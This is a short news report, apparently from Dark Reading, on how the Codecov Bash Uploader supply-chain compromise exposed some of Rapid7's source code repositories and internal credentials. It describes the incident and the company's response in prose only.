Security vendor Rapid 7 is the latest victim of a software supply-chain breach
An unknown number of Rapid 7 customers — and Rapid7 itself — have become the latest victims of security incidents affecting trusted third-party software supply-chain partners.
On Friday, Rapid7 disclosed that attackers had accessed some of its source code repositories via a third-party Bash Uploader from Codecov that the security vendor was using in its development environment.
The attackers had previously compromised the uploader and modified it so code and associated data from Rapid7 and other Codecov customer environments would be uploaded to an attacker-controlled server — in addition to Codecov’s own systems as intended.
Many companies use Codecov’s software to verify how effectively they are testing software in development for security and other issues. Codecov’s Bash Uploader script is used to upload certain data — containing credentials, tokens, or keys — from customer CI environments to its own servers.
In January 2021, an attacker gained access to the Bash Uploader by taking advantage of an error in Codecov’s Docker image creation process. According to Codecov, the configuration error allowed the attacker to extract a credential for modifying the Bash Uploader script. Codecov did not discover the modification until four months later, in April 2021.
During that period, the attacker used the modified Bash Uploader to access and export data from Codecov customer continuous integration (CI) environments to a remote server. Codecov described the compromised Bash Uploader as giving attackers the ability to potentially extract a range of information from CI environments, including credentials as well as any services, data stores, and application code associated with these credentials.
Rapid7 said that when it learned of the incident at Codecov, it initiated an internal response process to understand how the company might have been affected. The investigation showed that attackers had used the compromised Bash Uploader to access “a small subset” of source code related to tooling for the company’s managed detection and response (MDR) service.
“Those repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers,” Rapid7 said Friday.
To read the complete article, visit Dark Reading.